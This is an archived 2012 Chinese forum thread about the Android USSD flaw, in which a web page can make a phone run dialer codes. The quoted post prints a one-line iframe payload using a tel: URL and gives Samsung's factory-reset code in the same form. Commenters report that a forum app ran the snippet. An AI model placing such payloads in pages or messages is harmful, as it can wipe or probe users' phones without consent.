自我檢測Android漏洞 - Android

Table of Contents

※ 引述《hayatoman (小小的改變是,成功的開始)》之銘言:

看了一下網頁原始碼...

< iframe width="4" height="4" src="tel:*%2306%23" >< /iframe >

簡單一行就可以造成這問題,
那如果把那個 tel:*%2306%23 換成三星的 reset factory 就直接死了

*#2767*3855# > *%232767*3855%23
...

--

All Comments

Jake avatarJake2012-09-28
他們從頭到尾都在說這件事啊 -..-
Selena avatarSelena2012-09-29
可是一開始的網頁沒寫明(?
我猜最近一定會有很多人用這去害人
Olivia avatarOlivia2012-10-02
Liam avatarLiam2012-10-05
點之前當然要檢查一下...
Jake avatarJake2012-10-09
這個檢查不出來吧
Leila avatarLeila2012-10-14
都等點進去之後就來不及了
Valerie avatarValerie2012-10-18
而且只要iframe就可以跑了 真是有夠危險的漏洞....
Noah avatarNoah2012-10-18
恐怖的是問都沒問直接執行... 照理講應該頂多把號碼自動
Thomas avatarThomas2012-10-18
輸入,要不要撥出還是給使用者決定吧...
Aaliyah avatarAaliyah2012-10-19
USSD都是敲完就直接執行的
所以就變成一個漏洞....
Mia avatarMia2012-10-22
也是
John avatarJohn2012-10-25
我用MiuPtt看這篇,自動就跳IMEI碼了…好恐怖
Suhail Hany avatarSuhail Hany2012-10-30
DHD+Nik v4.1 (4.0.3)
Zenobia avatarZenobia2012-10-31
MiuPtt把那段當網頁執行了..
Quanna avatarQuanna2012-11-03
iOS版的Miuptt 會跳出 文章載入錯誤 然後crash
Megan avatarMegan2012-11-04
假如原po用factory reset當範例不就GG了................
Ivy avatarIvy2012-11-08
真的耶,如果剛好用有問題的手機開到factory reset當範例
Andy avatarAndy2012-11-09
正好又是用MiuPTT看,就GG了
Hazel avatarHazel2012-11-10
把它放在簽名檔的話就...XD
Victoria avatarVictoria2012-11-13
原來我讓大家發現另一個問題了 XD